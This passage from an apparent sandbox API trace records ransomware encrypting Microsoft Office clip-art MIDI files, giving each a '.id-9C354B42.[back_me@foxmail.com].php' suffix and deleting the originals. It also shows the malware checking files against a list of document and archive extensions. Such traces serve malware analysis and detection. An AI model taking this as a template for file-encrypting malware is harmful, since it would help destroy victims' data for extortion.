lpNumberOfBytesWritten=0x3a6fc9c*=0x1760, lpOverlapped=0x0) returned 1 [0249.173] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.173] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xea, lpOverlapped=0x0) returned 1 [0249.173] SetEndOfFile (hFile=0x210) returned 1 [0249.173] CloseHandle (hObject=0x210) returned 1 [0249.173] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.173] SetEndOfFile (hFile=0x380) returned 1 [0249.176] CloseHandle (hObject=0x380) returned 1 [0249.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid")) returned 1 [0249.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.176] lstrlenW (lpString=".doc") returned 4 [0249.176] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.176] lstrlenW (lpString=".docx") returned 5 [0249.176] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.176] lstrlenW (lpString=".pdf") returned 4 [0249.176] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.176] lstrlenW (lpString=".xls") returned 4 [0249.176] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.176] lstrlenW (lpString=".xlsx") returned 5 [0249.177] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.177] lstrlenW (lpString=".ppt") returned 4 [0249.177] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString=".zip") returned 4 [0249.177] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.177] lstrlenW (lpString=".rar") returned 4 [0249.177] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.177] lstrlenW (lpString=".bz2") returned 4 [0249.177] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.177] lstrlenW (lpString=".7z") returned 3 [0249.177] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString=".dbf") returned 4 [0249.177] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString=".1cd") returned 4 [0249.177] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString=".jpg") returned 4 [0249.177] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.177] lstrlenW (lpString=".doc") returned 4 [0249.177] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.177] lstrlenW (lpString=".docx") returned 5 [0249.177] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.178] lstrlenW (lpString=".pdf") returned 4 [0249.178] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.178] lstrlenW (lpString=".xls") returned 4 [0249.178] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.178] lstrlenW (lpString=".xlsx") returned 5 [0249.178] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.178] lstrlenW (lpString=".ppt") returned 4 [0249.178] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.178] lstrlenW (lpString=".zip") returned 4 [0249.178] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.178] lstrlenW (lpString=".rar") returned 4 [0249.178] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.178] lstrlenW (lpString=".bz2") returned 4 [0249.178] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.178] lstrlenW (lpString=".7z") returned 3 [0249.178] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.178] lstrlenW (lpString=".dbf") returned 4 [0249.178] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.178] lstrlenW (lpString=".1cd") returned 4 [0249.178] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 62 [0249.178] lstrlenW (lpString=".jpg") returned 4 [0249.178] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.178] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0249.179] lstrlenW (lpString="SUMER_01.MID") returned 12 [0249.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.179] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=14044) returned 1 [0249.179] CloseHandle (hObject=0x380) returned 1 [0249.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 0x20 [0249.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.180] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.180] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0249.180] GetLastError () returned 0x0 [0249.180] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x36dc, lpOverlapped=0x0) returned 1 [0249.182] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x36e0, lpOverlapped=0x0) returned 1 [0249.183] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.183] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0249.183] SetEndOfFile (hFile=0x210) returned 1 [0249.183] CloseHandle (hObject=0x210) returned 1 [0249.183] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.183] SetEndOfFile (hFile=0x380) returned 1 [0249.185] CloseHandle (hObject=0x380) returned 1 [0249.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.185] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 1 [0249.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.186] lstrlenW (lpString=".doc") returned 4 [0249.186] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.186] lstrlenW (lpString=".docx") returned 5 [0249.186] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.186] lstrlenW (lpString=".pdf") returned 4 [0249.186] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.186] lstrlenW (lpString=".xls") returned 4 [0249.186] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.186] lstrlenW (lpString=".xlsx") returned 5 [0249.186] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.186] lstrlenW (lpString=".ppt") returned 4 [0249.186] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.186] lstrlenW (lpString=".zip") returned 4 [0249.186] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.186] lstrlenW (lpString=".rar") returned 4 [0249.186] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.186] lstrlenW (lpString=".bz2") returned 4 [0249.186] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.186] lstrlenW (lpString=".7z") returned 3 [0249.186] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString=".dbf") returned 4 [0249.187] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString=".1cd") returned 4 [0249.187] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString=".jpg") returned 4 [0249.187] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString=".doc") returned 4 [0249.187] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.187] lstrlenW (lpString=".docx") returned 5 [0249.187] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.187] lstrlenW (lpString=".pdf") returned 4 [0249.187] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.187] lstrlenW (lpString=".xls") returned 4 [0249.187] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.187] lstrlenW (lpString=".xlsx") returned 5 [0249.187] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.187] lstrlenW (lpString=".ppt") returned 4 [0249.187] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.187] lstrlenW (lpString=".zip") returned 4 [0249.187] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.187] lstrlenW (lpString=".rar") returned 4 [0249.187] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.187] lstrlenW (lpString=".bz2") returned 4 [0249.188] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.188] lstrlenW (lpString=".7z") returned 3 [0249.188] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.188] lstrlenW (lpString=".dbf") returned 4 [0249.188] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.188] lstrlenW (lpString=".1cd") returned 4 [0249.188] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63 [0249.188] lstrlenW (lpString=".jpg") returned 4 [0249.188] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.188] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0249.188] lstrlenW (lpString="SWEST_01.MID") returned 12 [0249.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.188] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=8501) returned 1 [0249.188] CloseHandle (hObject=0x380) returned 1 [0249.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 0x20 [0249.189] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.189] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.189] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0249.190] GetLastError () returned 0x0 [0249.190] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x2135, lpOverlapped=0x0) returned 1 [0249.191] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x2140, lpOverlapped=0x0) returned 1 [0249.193] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.193] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0249.193] SetEndOfFile (hFile=0x210) returned 1 [0249.193] CloseHandle (hObject=0x210) returned 1 [0249.193] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.193] SetEndOfFile (hFile=0x380) returned 1 [0249.196] CloseHandle (hObject=0x380) returned 1 [0249.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0249.196] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\swest_01.mid")) returned 1 [0249.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.196] lstrlenW (lpString=".doc") returned 4 [0249.196] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.196] lstrlenW (lpString=".docx") returned 5 [0249.196] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.196] lstrlenW (lpString=".pdf") returned 4 [0249.196] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.196] lstrlenW (lpString=".xls") returned 4 [0249.196] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.196] lstrlenW (lpString=".xlsx") returned 5 [0249.197] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.197] lstrlenW (lpString=".ppt") returned 4 [0249.197] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString=".zip") returned 4 [0249.197] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.197] lstrlenW (lpString=".rar") returned 4 [0249.197] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.197] lstrlenW (lpString=".bz2") returned 4 [0249.197] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.197] lstrlenW (lpString=".7z") returned 3 [0249.197] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString=".dbf") returned 4 [0249.197] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString=".1cd") returned 4 [0249.197] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString=".jpg") returned 4 [0249.197] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.197] lstrlenW (lpString=".doc") returned 4 [0249.197] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0249.197] lstrlenW (lpString=".docx") returned 5 [0249.197] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0249.197] lstrlenW (lpString=".pdf") returned 4 [0249.197] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0249.197] lstrlenW (lpString=".xls") returned 4 [0249.198] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0249.198] lstrlenW (lpString=".xlsx") returned 5 [0249.198] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0249.198] lstrlenW (lpString=".ppt") returned 4 [0249.198] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0249.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.198] lstrlenW (lpString=".zip") returned 4 [0249.198] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0249.198] lstrlenW (lpString=".rar") returned 4 [0249.198] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0249.198] lstrlenW (lpString=".bz2") returned 4 [0249.198] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0249.198] lstrlenW (lpString=".7z") returned 3 [0249.198] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0249.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.198] lstrlenW (lpString=".dbf") returned 4 [0249.198] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0249.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.198] lstrlenW (lpString=".1cd") returned 4 [0249.198] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0249.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID") returned 63 [0249.198] lstrlenW (lpString=".jpg") returned 4 [0249.198] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0249.198] lstrcmpiW (lpString1=".MID", lpString2=".php") returned -1 [0249.198] lstrlenW (lpString="URBAN_01.MID") returned 12 [0249.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.199] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=13358) returned 1 [0249.199] CloseHandle (hObject=0x380) returned 1 [0249.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 0x20 [0249.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0249.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0249.199] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.200] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0249.200] GetLastError () returned 0x0 [0249.200] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x342e, lpOverlapped=0x0) returned 1 [0249.202] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x3430, lpOverlapped=0x0) returned 1 [0249.204] ReadFile (in: hFile=0x380, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0249.204] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0249.204] SetEndOfFile (hFile=0x210) returned 1 [0249.204] CloseHandle (hObject=0x210) returned 1 [0249.204] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0249.204] SetEndOfFile (hFile=0x380) returned 1 [0249.462] CloseHandle (hObject=0x380) returned 1 [0249.462] SetFileAttributesW 